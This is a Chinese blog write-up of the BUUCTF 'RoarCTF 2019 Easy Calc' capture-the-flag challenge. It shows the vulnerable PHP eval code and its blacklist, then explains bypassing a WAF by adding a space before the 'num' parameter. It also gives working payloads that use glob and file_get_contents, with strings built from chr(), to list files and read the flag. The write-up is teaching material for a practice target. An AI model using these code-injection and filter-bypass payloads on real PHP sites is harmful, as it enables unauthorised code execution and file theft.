BUUCTF-日刷-[RoarCTF 2019]Easy Calc/php字符串解析

BUUCTF-日刷-[RoarCTF 2019]Easy Calc/php字符串解析

 

 

 进去是一个计算机界面,很大感觉是ssti模板注入(然而并不是)

看js代码,在/calc.php处理数据

BUUCTF-日刷-[RoarCTF 2019]Easy Calc/php字符串解析

 

 

 BUUCTF-日刷-[RoarCTF 2019]Easy Calc/php字符串解析

 

 

 代码:

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

这里是个命令执行,要绕过黑名单

这样修饰符号/m是指多行匹配:使边界字符 ^ 和 $ 匹配每一行的开头和结尾,记住是多行,而不是整个字符串的开头和结尾。

这里看黑名单可以发现,其实它并没有过滤很多。但是随意输入一个phpinfo()

BUUCTF-日刷-[RoarCTF 2019]Easy Calc/php字符串解析

 

发现显示forbidden,经过测试发现字母全都被过滤了

这里利用php的字符串解析特性的一个漏洞:链接

具体就是在num前面加个空格

BUUCTF-日刷-[RoarCTF 2019]Easy Calc/php字符串解析

 

 

 

 

 这里试了一下发现system貌似用不了,那就用php自带的函数吧

这里开始准备是用pirnt_r(glob('*'))

但是发现单引号被过滤了,这里用chr(42)代替(就是*),这样可以不用单引号

? num=http://node4.buuoj.cn:28620/calc.php?%20num=print_r(glob(chr(42)));

BUUCTF-日刷-[RoarCTF 2019]Easy Calc/php字符串解析

 

 

 根目录发现flag

BUUCTF-日刷-[RoarCTF 2019]Easy Calc/php字符串解析

 

 直接print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));

过滤了单引号,不好传入字符串,用chr拼凑

BUUCTF-日刷-[RoarCTF 2019]Easy Calc/php字符串解析

 

上一篇:wp-buuctf-babysql


下一篇:[ 2021-10-02 ][BUUCTF] 集训第五天